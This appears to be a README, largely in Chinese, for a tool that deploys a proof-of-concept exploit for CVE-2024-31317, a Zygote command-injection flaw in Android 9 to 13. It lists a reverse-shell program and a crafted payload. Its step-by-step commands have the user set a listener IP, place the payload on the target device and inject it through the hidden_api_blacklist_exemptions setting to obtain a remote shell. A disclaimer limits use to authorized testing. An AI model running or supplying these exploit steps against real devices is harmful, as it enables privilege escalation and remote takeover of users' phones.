Share
## https://sploitus.com/exploit?id=2A45D4B0-8D53-5E00-9391-066C80E043D9
# CVE-2024-31317-PoC-Deployer



A deployment tool for CVE-2024-31317 proof-of-concept exploit targeting Android 9 through 13 devices.
## 📝 项目描述
CVE-2024-31317-PoC-Deployer 是一个自动化部署脚本,用于快速生成和配置 CVE-2024-31317 漏洞利用所需的全部文件。该漏洞影响 Android 9 到 13 的设备,允许通过 Zygote 进程实现权限提升并执行任意代码。
## 🚨 漏洞信息
- **CVE ID**: CVE-2024-31317
- **影响范围**: Android 9 到 Android 13
- **修复版本**: 2024年6月补丁级别及以后的Android版本
- **漏洞类型**: Zygote进程命令注入
- **所需权限**: WRITE_SECURE_SETTINGS
## 📦 包含文件
- `reverse_shell.c` - C语言实现的反向shell程序
- `payload.txt` - 特殊构造的漏洞利用payload
- `compile.sh` - 自动编译脚本
- `README.txt` - 详细使用说明
- `CVE-2024-31317.txt` - 漏洞技术分析文档
## 🛠️ 快速开始
1. **运行部署脚本**:
```bash
./deploy.sh
```
2. **编译反向shell**:
```bash
./compile.sh
```
3. **运行反向shell监听器**:
```bash
./reverse_shell
```
## 💣 漏洞利用步骤
1. 上传 `payload.txt` 到目标设备的 `/data/local/tmp/`
2. 替换 payload.txt 中的 `xxx.xxx.xxx` 为你的监听服务器IP
3. 在目标设备上执行以下命令序列:
```bash
am force-stop com.android.settings
cd /data/local/tmp/
settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
am start -n com.android.settings/.Settings
settings put global hidden_api_blacklist_exemptions "null"
```
## ⚠️ 免责声明
此工具仅用于合法的安全测试和研究目的。使用前必须获得目标系统的明确授权。未经授权的使用可能违反法律。开发者不对任何滥用行为负责。
## 📜 许可证
本项目采用 MIT 许可证 - 详情请参阅 [LICENSE](LICENSE) 文件。
## 📚 技术参考
- [Android Security Bulletin - June 2024](https://source.android.com/docs/security/bulletin)
- [CVE-2024-31317 Details](https://vulners.com/cve/CVE-2024-31317)